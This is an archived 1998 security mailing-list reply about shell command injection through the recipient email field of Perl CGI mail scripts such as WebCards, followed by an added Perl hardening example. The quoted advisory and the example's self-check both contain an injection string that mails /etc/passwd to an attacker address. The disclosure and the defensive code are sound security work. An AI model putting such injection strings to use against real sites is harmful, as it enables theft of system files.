Re: Several new CGI vulnerabilities

From: Karl Hanmore (avatarat_private)
Date: Tue Nov 10 1998 - 00:45:24 PST

    G'day,
            As a related note, the WebCards program (V1.6) by Sam Kareem
    (webmasterat_private) is subject to the same vulnerability.
    
    Regards,
            Karl
    
    On Mon, 9 Nov 1998, xnec wrote:
    
    > INFO:
    >         After looking over the perl-CGI scripts on www.cgi-resources.com,
    > I've discovered vulnerabilities in the following:
    >
    
    -----Snip----8<-----------------
    
    >
    > EXPLOIT:
    >
    > Each of these is exploitable by inputting metacharacters into the
    > recipient's email address.  Each script calls something similar
    > to:
    >
    >  open( MAIL, "|$mailprog $email" )
    >  # this particular line is from the LakeWeb scripts
    >
    > The exploit strings are simple, something like
    > &mail evilat_private < /etc/passwd&@host.com will work for each script
    > (the @host.com is necessary because some hosts check for "@" and ".")
    > when placed in the Recipient Email field.
    >
    -----Snip-----8<---------------
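
Added example, not part of the original messages or of any script named in them: one way to harden the quoted `open( MAIL, "|$mailprog $email" )` pattern, so the recipient is validated against an allow-list and never reaches a shell. The sendmail path, the function names and the sample addresses are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed location; the scripts discussed above keep theirs in $mailprog.
my $mailprog = '/usr/sbin/sendmail';

# Allow-list check for an address taken from a form field. Anything outside
# the listed characters (whitespace, & ; | < > ` $ quotes, newlines) is
# rejected, as is a leading '-' that a mailer could read as an option.
sub valid_recipient {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?/;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*\@$label(?:\.$label)+\z/ ? 1 : 0;
}

sub send_card {
    my ($to, $subject, $body) = @_;
    die "rejected recipient\n" unless valid_recipient($to);
    $subject =~ s/[\r\n]+/ /g;    # keep the subject from adding header lines

    # Vulnerable form from the post: open( MAIL, "|$mailprog $email" )
    # passes one string to /bin/sh, which interprets metacharacters.
    # List-form pipe open (Perl 5.8+) executes $mailprog directly, with no
    # shell. '-t' makes sendmail read recipients from the headers, so the
    # address is never a command-line argument; '-oi' keeps a lone '.' line
    # from ending the message early.
    open(my $mail, '|-', $mailprog, '-oi', '-t')
        or die "cannot run $mailprog: $!\n";
    print {$mail} "To: $to\nSubject: $subject\n\n$body\n";
    close($mail) or die "$mailprog exited with status $?\n";
    return 1;
}

# Self-check on constructed input; no mail is sent. The second entry is the
# string quoted in the post, the others are made up for this example.
unless (caller) {
    my @samples = (
        'friend@example.com',
        '&mail evilat_private < /etc/passwd&@host.com',
        '-oQ/tmp@example.com',
        "friend\@example.com\nBcc: other\@example.com",
    );
    for my $addr (@samples) {
        (my $shown = $addr) =~ s/\n/\\n/g;
        printf "%-8s %s\n", valid_recipient($addr) ? 'accept' : 'reject', $shown;
    }
}
```

Only the first sample is accepted. The check for "@" and "." that the post mentions is not sufficient on its own, which is why the pattern is anchored with \A and \z and lists permitted characters rather than forbidden ones.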
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:22:40 PDT